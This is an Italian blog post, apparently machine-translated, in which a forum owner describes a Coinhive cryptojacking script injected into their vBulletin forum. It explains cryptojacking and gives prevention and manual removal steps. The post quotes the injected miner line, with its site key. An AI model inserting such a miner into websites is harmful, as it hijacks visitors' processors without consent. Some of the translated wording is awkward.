Come rimuovere lo script crittografico di Coinhive dal tuo sito

Di solito visito il forum tutti i giorni e non l`avevo visto il giorno prima. Quindi presumo che questo sia successo qualche volta durante la notte, il mio tempo, quando stavo dormendo.

Uso il software vBulletin per il forum, ed è stato aggiornato all`ultima versione. Inoltre, questo è stato abbastanza sorprendente per noi, dato che il dominio TheWindowsClub.com utilizza Sucuri Web Antivirus & Firewall per proteggersi dalle minacce e dagli attacchi online.

Il mio software di sicurezza per PC ha fermato con successo lo script dannoso sul mio computer Windows 10. Ho controllato con altri browser come Chrome & Edge e i risultati erano uguali.

Dopo aver fatto clic con il pulsante destro del mouse sulla pagina Web del forum e verificato il codice sorgente, ho scoperto che si trattava di uno script malevolo CryptoMiner di CoinHive.

Questo è il Coinhive Javascript dannoso che aveva ottenuto nel mio codice del forum:

var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Comunque, la prima cosa che ho fatto è stato prendere il forum giù e informa Sucuri.

I Sucuri hanno ripulito il forum della sceneggiatura di Coinhive che era stata inserita nel mio forum in poche ore, e tutti i andavano bene.

Che cos`è CoinHive

Offerte Coinhive un minatore JavaScript per la criptovaluta Monero che puoi incorporare nel tuo sito web e utilizzare la CPU dei computer dei visitatori del sito Web per estrarre le monete per te.

Si chiama Cryptojacking . Implica il dirottamento dei browser degli utenti per l`estrazione di criptovaluta. Alcuni proprietari di siti Web potrebbero utilizzarlo personalmente per fare soldi, ma nel nostro caso sono stati iniettati.

Quando un utente accede al sito infetto, il Coinhive JavaScript esegue e estrae Monero utilizzando le risorse della CPU dell`utente. Ciò potrebbe causare un rallentamento della CPU e crash imprevisto del sistema della vittima.

Ora, se il tuo browser è infetto, il tuo utilizzo delle risorse aumenterà. Chiudi il browser e verrà rilasciato. l`utente può notare il riscaldamento della sua macchina, la velocità della ventola o lo scaricamento veloce della batteria.

Ho chiesto al mio collega Saurabh Mukhekar di visitare il mio forum usando il suo Mac e vedere cosa è successo. Bene, anche il suo computer Mac è stato colpito quando ha aperto il forum con Safari! È uno di quegli smart utenti Mac OSX che utilizza un software antivirus per il suo Mac. Il suo antivirus Avast per Mac ha impedito l`esecuzione dello script dannoso.

Said Saurabh,

Il malware CoinHive non solo dirotta un PC Windows ma anche il Mac, in quanto è un`infezione basata su browser. È bene che non creda nel mito che i Mac non abbiano bisogno di un software antivirus, altrimenti la mia macchina sarebbe stata infetta e il mio Mac avrebbe continuato a sfornare monete per qualcun altro.

Impedisci a CoinHive di infettare il tuo sito web

1. Non utilizzare alcun modello NULL o plug-in sul tuo sito Web / forum.
2. Tieni aggiornato il tuo CMS alla versione più recente.
3. Aggiorna il tuo software di hosting regolarmente (PHP, Database, ecc.).
4. Proteggi il tuo sito web con provider di sicurezza Web come Sucuri, Cloudflare, Wordfence, ecc.
5. Prendi le precauzioni di base per proteggere il tuo blog.

CoinHive min rimozione dal sito web

Prima di tutto, devi essere il webmaster del sito Web infetto o con credenziali amministrative che consentono l`accesso a tutti i file del sito Web.

Ora, quando il tuo antivirus rileva l`infezione CoinHive, fai clic con il tasto destro sulla pagina Web e seleziona Visualizza codice sorgente. Quindi premere Ctrl + F e cercare "CoinHive".

Una volta identificata la posizione del codice dannoso, è necessario vedere la sua posizione, dove si trova. Ora devi rimuoverlo manualmente. Per fare questo, hai bisogno di un po `di conoscenza del codice della tua piattaforma. Dovrai localizzare il file / i infetto e rimuovere manualmente lo script sopra da esso. Se non ne sei sicuro, chiedi ad un esperto di farlo. Dato che usiamo Sucuri, glielo lasciamo fare.

Fatto ciò, svuota il server e la cache del browser. Se si utilizza un plugin per la cache o si dice MaxCDN, cancellare anche quelle cache.

Proteggersi contro gli script di crittografia

La tecnologia Cryptocurrencies e Blockchain sta conquistando il mondo. Sta creando un impatto sull`economia globale e causando anche interruzioni della tecnologia. Tutti hanno iniziato a concentrarsi su un mercato così redditizio - e questo include anche gli hacker di siti web. Poiché i rendimenti aumentano, dovremmo aspettarci che tali tecnologie vengano utilizzate in modo improprio. Questo è il lato oscuro di qualsiasi tecnologia emergente.

Quello che possiamo fare è prendere le migliori precauzioni possibili in ogni momento. Oltre all`utilizzo di un buon software di sicurezza, utilizza un`estensione per Chrome o Firefox che impedisce ai siti web di utilizzare la tua CPU per criptare le criptovalute - o meglio ancora, usare Anti-WebMiner per interrompere gli attacchi di Cryptojacking Mining Script modificando il tuo file Hosts. Funziona su tutti i browser. Se sei un utente Mac, ti preghiamo di procurarti anche un software antivirus per il tuo computer.

Come misura di massima precauzione, se pensi di aver visitato un sito infetto, sarebbe una buona idea svuotare il browser cache e scansiona la tua macchina con il tuo software antivirus e AdwCleaner.

Stai al sicuro, stai attento!